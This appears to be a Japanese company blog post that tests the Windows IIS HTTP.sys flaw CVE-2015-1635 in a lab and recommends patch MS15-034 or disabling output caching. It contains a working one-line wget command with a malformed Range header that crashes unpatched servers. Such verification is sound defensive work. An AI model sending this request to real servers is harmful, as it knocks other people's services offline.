Windowsサーバーの脆弱性について検証してみた(CVE-2015-1635)

この記事は公開されてから半年以上経過しています。情報が古い可能性がありますので、ご注意ください。

来週の人間ドックのが個人的には恐ろしいけど
しれと同じくらい深刻な脆弱性がWindowsサーバで4/16に発表されました。

少し興味があったのでパッチ適用しないとどうなるかを検証してみました。

結論からWindows Server 2008 R2以降のOSで
IISをデフォルトで設定している場合は簡単に攻撃が成功してしまいます。
攻撃が成功するとサーバの停止が発生します。

■検証環境
Windows Server 2003 R2
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
※全てIISをデフォルト設定で設定

■検証方法
Linuxサーバから下記コマンドを実行
wget –header=”Range: bytes=18-18446744073709551615″ [対象サイト]/welcome.png

■対策
MS15-034を適用(要再起動)
またはIISのみの対策として出力キャッシュを無効にする事でも本件は回避できますが
パフォーマンス影響等が出る可能性ありますので出来ればMS15-034の適用を推奨します。

投稿者プロフィール

tsubo
2014年6月からスカイアーチに入社しました新入りのおっさんです。
雑食な性格ですのでその時の気分で記事を投稿していきたいと思います。

コメントを残す

メールアドレスが公開されることはありません。

Time limit is exhausted. Please reload CAPTCHA.

ABOUTこの記事をかいた人

2014年6月からスカイアーチに入社しました新入りのおっさんです。 雑食な性格ですのでその時の気分で記事を投稿していきたいと思います。